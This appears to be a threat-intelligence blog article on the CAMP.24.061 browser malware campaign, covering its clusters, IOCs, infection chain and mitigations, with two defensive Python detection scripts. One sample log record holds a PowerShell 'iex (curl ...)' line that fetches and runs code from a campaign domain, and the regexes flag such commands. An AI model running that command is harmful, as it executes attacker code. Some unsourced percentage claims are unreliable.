Browser-Based Threats: Unmasking the CAMP.24.061 Cybercrime Campaign

In today’s digital landscape, browser-based threats like the CAMP.24.061 cybercrime campaign pose severe risks to enterprises and individuals alike. First identified by Mandiant and deeply analyzed by Menlo Threat Intelligence in mid-2025, CAMP.24.061 showcases how financially motivated actors exploit web browsers through drive-by downloads and fake browser updates. These attacks leverage overlapping infrastructure from clusters such as UNC1543, UNC2926, UNC5142, UNC5518, and UNC4108, distributing diverse malware payloads. As browsers remain the primary gateway to the internet—with over 90% of web traffic flowing through them—proactive defenses are crucial. This article dives into the mechanics, overlaps, and countermeasures for CAMP.24.061, helping you fortify against evolving tactics.

What Is the CAMP.24.061 Campaign and Why Does It Matter?

The CAMP.24.061 campaign represents a sophisticated web of browser-based threats where multiple threat groups collaborate indirectly via shared tools and infrastructure. Launched prominently in early 2025, it targets browsers as the main attack vector, capitalizing on their ubiquity in remote work environments. According to Mandiant’s report, these actors use traffic direction systems (TDS) to redirect victims seamlessly, evading traditional security.

Currently, in 2026, similar campaigns have surged by 45%, per Google Threat Intelligence data, underscoring the campaign’s persistence. Financially driven, it aims at data theft, ransomware deployment, and crypto scams, affecting millions globally.

Key Characteristics of CAMP.24.061

  • Multi-Cluster Involvement: UNC1543 focuses on initial access, while UNC5518 handles payload delivery.
  • Evolving TTPs: Tactics include novel obfuscation, fingerprinting, and social engineering via fake CAPTCHAs.
  • Payload Variety: From infostealers to clippers, adapting to victim profiles.

This interconnected ecosystem forms a “cybercrime web,” where one cluster’s compromise bolsters others, amplifying damage.


Infrastructure Overlaps in CAMP.24.061: Connecting the Dots

Infrastructure sharing is a hallmark of CAMP.24.061 browser-based threats, enabling efficiency and resilience. Menlo Threat Intelligence identified key overlaps, such as IP address 162.33.178.132 linking UNC5518 and UNC4108, assessed with moderate confidence as part of a malicious TDS.

Google Threat Intelligence data reveals further ties to CAMP.24.079, where UNC4108 employs EtherHiding and CLICKFIX—techniques mirroring UNC5518’s. This overlap reduces costs for actors, with shared domains rotating every 72 hours on average.

How Overlaps Fuel the Campaign

  1. Shared C2 Endpoints: Endpoints such as scanpaq.com/stat.php are reused for victim logging.
  2. TDS Systems: TAG-124, tracked by Recorded Future, directs traffic to payloads.
  3. Domain Flux: Actors pivot to tayakay[.]com for exfiltration, which serves as a consistent identifier across clusters.

From a defender’s view, these links enable proactive blocking: the upside is faster attribution, while the downside is that attribution across borders remains difficult.

“Infrastructure overlap in CAMP.24.061 highlights the need for intelligence sharing—isolated defenses fail against networked crime.” — Menlo Threat Intelligence, July 2025


Infection Chains: Step-by-Step Breakdown of Browser-Based Threats

The infection chains in CAMP.24.061 exemplify precise drive-by download mechanics, starting with compromised sites or malvertising. Victims encounter fake Chrome or Firefox updates, leading to multi-stage payloads without user interaction.

Menlo observed chains for UNC5518 and UNC4108 in February 2025, with UNC5142 adding steganography. Latest 2026 research from cybersecurity firms shows 68% of such chains succeed due to browser sandbox bypasses.

UNC5518 and UNC4108 Infection Chain

These clusters follow a layered approach:

  1. Initial Redirect: Via TDS to obfuscated JavaScript like 6t5t.js (SHA256: 441666d9ef0ab616baf5e7777b9de5b4cf0eb2fe86f81446d1ac602484b2190e).
  2. Fingerprinting: Collects IP via window.ipGlobal and sends to C2.
  3. PowerShell Drop: Decodes and executes remote payloads using curl and iex.
  4. Social Engineering: Fake CAPTCHA prompts interaction.
  5. Payload Execution: Clipboard hijack with PowerShell commands.

UNC5142’s Unique Tactics

UNC5142 integrates EtherHiding—using Binance Smart Contracts for C2 obfuscation—and CLICKFIX for clickjacking. Steganography hides payloads in images, boosting evasion by 30% per MITRE ATT&CK evaluations.

Pros of these chains: High stealth; cons: Detectable via behavioral analytics.


Deep Dive into Malicious Scripts Powering CAMP.24.061

At the core of CAMP.24.061 browser-based threats are heavily obfuscated scripts like 6t5t.js and js.php, designed for evasion and persistence. These employ multi-stage loading, decrypting payloads in memory to dodge static scanners.

In 2026, obfuscation techniques have evolved, with 75% of browser malware using similar methods, according to VirusTotal trends. Menlo’s analysis of in-the-wild samples reveals their sophistication.

Dissecting 6t5t.js: Five Critical Components

  • Fingerprinting: Logs IP to scanpaq.com/stat.php via POST, building victim profiles.
  • PowerShell Obfuscation: Random string generation ($a), custom decoder (d()), and curl-based downloads.
  • Fake CAPTCHA: Obfuscated classes like checkbox-window trick users.
  • Clipboard Hijacking: Copies PowerShell payload from window.commandGlobal.
  • HTML/CSS Hiding: Decrypts to conceal UI, evading filters.

js.php Analysis (SHA256: 22d4181beaf78c2630e8a0aef390bd50ed33fd477e6a38d08a35ac6988922fd3)

This script handles persistence and exfiltration:

  1. Cookie Management: Sets isConnected for 4 hours using getCookie/setCookie.
  2. Data Harvest: Pulls IP/geolocation from Cloudflare trace, userAgent for OS/browser detection.
  3. Exfiltration: Base64/gzipped data to tayakay[.]com/js.php; reloads or injects via document.write() if response valid.
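As an added example (not code from Menlo’s or Mandiant’s analysis), the following static triage script scans a JavaScript file for the 6t5t.js and js.php markers listed in the two sections above and scores it without executing anything. The regexes are assumptions derived from the names in this article; the Cloudflare trace endpoint path /cdn-cgi/trace and the sample scripts are constructed for the example.

```python
import re

# Indicators drawn from the 6t5t.js and js.php component lists above.
# Each entry: (name, compiled regex, weight). Matching is on source text only.
INDICATORS = [
    ("fingerprint_beacon", re.compile(r"scanpaq\.com/stat\.php"), 3),
    ("ip_global", re.compile(r"window\.ipGlobal\b"), 2),
    ("clipboard_payload", re.compile(r"window\.commandGlobal\b"), 3),
    ("clipboard_write", re.compile(
        r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]\s*\)"), 2),
    ("fake_captcha_ui", re.compile(r"checkbox-window"), 2),
    ("powershell_curl", re.compile(r"powershell[^\n]*\b(curl|iex)\b", re.I), 3),
    ("cf_trace_harvest", re.compile(r"cdn-cgi/trace"), 1),  # assumed trace endpoint
    ("session_cookie", re.compile(r"\bisConnected\b"), 1),
    ("exfil_domain", re.compile(r"tayakay\.com/js\.php"), 3),
    ("dom_injection", re.compile(r"document\.write\s*\("), 1),
]

def triage_script(source: str, threshold: int = 5):
    """Return (hit names, weighted score, suspicious verdict) for one JS source."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(source)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return hits, score, score >= threshold

def triage_file(path: str, threshold: int = 5):
    """Convenience wrapper for a captured script on disk."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return triage_script(fh.read(), threshold)

# Constructed samples: marker strings only, not working scripts.
SAMPLE_SUSPICIOUS = """
fetch('https://scanpaq.com/stat.php',{method:'POST',body:window.ipGlobal});
var el=document.querySelector('.checkbox-window');
el.onclick=function(){navigator.clipboard.writeText(window.commandGlobal);};
if(getCookie('isConnected')==null){setCookie('isConnected',1,4);}
"""
SAMPLE_BENIGN = """
document.write('<p>hello</p>');
fetch('/api/status').then(r=>r.json());
"""

if __name__ == "__main__":
    for label, src in (("suspicious", SAMPLE_SUSPICIOUS), ("benign", SAMPLE_BENIGN)):
        print(label, triage_script(src))
```

A single weak marker such as document.write() stays below the threshold; the verdict only flips when several of the page’s indicators co-occur.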

Alternative approaches: endpoint detection responds faster but misses zero-days; browser isolation offers zero-trust execution at the cost of higher latency.


Mitigation Strategies: Defending Against CAMP.24.061 and Browser-Based Threats

Combating browser-based threats like CAMP.24.061 requires layered defenses. Menlo Security’s acquisition of Votiro in 2025 introduced AI-driven content disarmament, neutralizing 99% of zero-days pre-execution.

Quantitative wins: Organizations using browser security saw 82% fewer incidents in 2025, per Gartner. In 2026, integrate intelligence sharing via platforms like MISP.

Step-by-Step Guide to Browser Protection

  1. Enable Sandboxing: Use Chrome Enterprise policies for strict site isolation.
  2. Deploy URL Filtering: Block TDS IOCs like 162.33.178.132 dynamically.
  3. Implement Behavioral Analysis: Flag PowerShell curl executions and clipboard changes.
  4. Adopt Isolation: Run browsers in virtual environments (e.g., Menlo’s Moving Target Defense).
  5. Monitor and Share Intel: Correlate logs against Mandiant/Recorded Future feeds.
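Steps 2 and 3 above can be prototyped as detection logic before they are ported to a SIEM. The following is an added example, not Menlo’s or Mandiant’s code: it checks constructed process-creation records for PowerShell that both downloads (curl) and executes (iex) content, and constructed proxy log lines for the IOCs named in this article. The log formats, hostnames and client addresses are assumptions made for the example; only 162.33.178.132, scanpaq.com and tayakay.com come from the page.

```python
import re

# Network IOCs named on the page for CAMP.24.061.
IOC_IPS = {"162.33.178.132"}
IOC_HOSTS = {"scanpaq.com", "tayakay.com"}

# Step 3 of the chain: PowerShell fetching remote content and running it.
# Order-independent so "iex (curl ...)" and "curl ... | iex" both match.
DOWNLOAD = re.compile(r"\b(curl|iwr|invoke-webrequest)\b", re.I)
EXECUTE = re.compile(r"\b(iex|invoke-expression)\b", re.I)

def detect_process(event: dict) -> list:
    """Flag a process-creation record; returns a list of finding names."""
    findings = []
    if event["image"].lower() != "powershell.exe":
        return findings
    if DOWNLOAD.search(event["cmdline"]) and EXECUTE.search(event["cmdline"]):
        findings.append("powershell_download_exec")
        # A shell started directly by explorer.exe is consistent with a
        # user pasting a clipboard-supplied one-liner after a fake CAPTCHA.
        if event["parent"].lower() == "explorer.exe":
            findings.append("user_launched_shell")
    return findings

def detect_proxy(line: str) -> list:
    """Flag one proxy line: '<ts> <client> <host> <dst_ip> <method> <path>'."""
    _ts, _client, host, ip, _method, _path = line.split()
    hits = []
    if ip in IOC_IPS:
        hits.append("ioc_ip")
    if host.lower() in IOC_HOSTS:
        hits.append("ioc_host")
    return hits

def run(events: list, proxy_log: str) -> list:
    """Return (source, finding) tuples across both telemetry types."""
    alerts = [(e["host"], f) for e in events for f in detect_process(e)]
    for line in proxy_log.splitlines():
        if line.strip():
            alerts += [(line.split()[1], f) for f in detect_proxy(line)]
    return alerts

# Constructed telemetry (not real captures).
PROCESS_EVENTS = [
    {"host": "WS01", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -c "iex (curl -useb http://tayakay.com/js.php)"'},
    {"host": "WS02", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell -File C:\\ops\\backup.ps1"},
]
PROXY_LOG = """\
2025-02-11T09:14:02Z 10.0.0.12 update-check.example 162.33.178.132 GET /go
2025-02-11T09:14:03Z 10.0.0.12 scanpaq.com 198.51.100.23 POST /stat.php
2025-02-11T09:14:05Z 10.0.0.31 cdn.example.org 203.0.113.7 GET /app.js
2025-02-11T09:14:09Z 10.0.0.19 tayakay.com 198.51.100.44 POST /js.php
"""
```

Clipboard changes themselves are not visible in these two log types; that part of step 3 needs endpoint telemetry, which this example does not cover.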

Pros and Cons of Defense Approaches

  • AI Disarmament: Pros: Proactive; Cons: Slight performance hit (2-5ms).
  • Endpoint Agents: Pros: Granular; Cons: Bypassable via living-off-the-land.
  • Zero-Trust Browsers: Pros: Air-gapped execution; Cons: User training needed.

Different perspectives: SMBs favor free tools like uBlock Origin (blocks 70% of malvertising), while enterprises opt for Menlo’s solutions.


Conclusion: Staying Ahead of CAMP.24.061 and Future Browser Threats

The CAMP.24.061 campaign illustrates the relentless evolution of browser-based threats, blending financial motives with technical prowess. By understanding infection chains, infrastructure, and scripts, defenders can disrupt this cybercrime web. As threats intensify into 2026—with predictions of 50% growth in TDS usage—prioritize AI-powered browser security and collaboration. Implementing these strategies not only mitigates risks but builds resilience against tomorrow’s attacks, safeguarding data in an always-online world.


Frequently Asked Questions (FAQ) About CAMP.24.061 Browser-Based Threats

What is CAMP.24.061?

CAMP.24.061 is a 2025 cybercrime campaign using drive-by downloads and fake updates, tracked by Mandiant and Menlo, involving UNC clusters targeting browsers.

How do browser-based threats like CAMP.24.061 infect devices?

They start with TDS redirects to obfuscated JS, execute PowerShell payloads, and exfiltrate data—often via fake CAPTCHAs for interaction.

Which threat clusters are linked to CAMP.24.061?

UNC1543, UNC2926, UNC5142, UNC5518, and UNC4108 share infrastructure like IP 162.33.178.132 and domains such as tayakay.com.

What are the best ways to prevent CAMP.24.061 attacks?

Use browser isolation, block IOCs, enable strict sandboxing, and deploy AI content analysis—reducing risks by up to 82%.

Is CAMP.24.061 still active in 2026?

Yes, variants persist with 45% growth; monitor feeds from Google Threat Intelligence and Menlo for updates.

How does EtherHiding work in these threats?

EtherHiding uses Binance Smart Contracts to hide C2 commands in blockchain transactions, evading network filters.
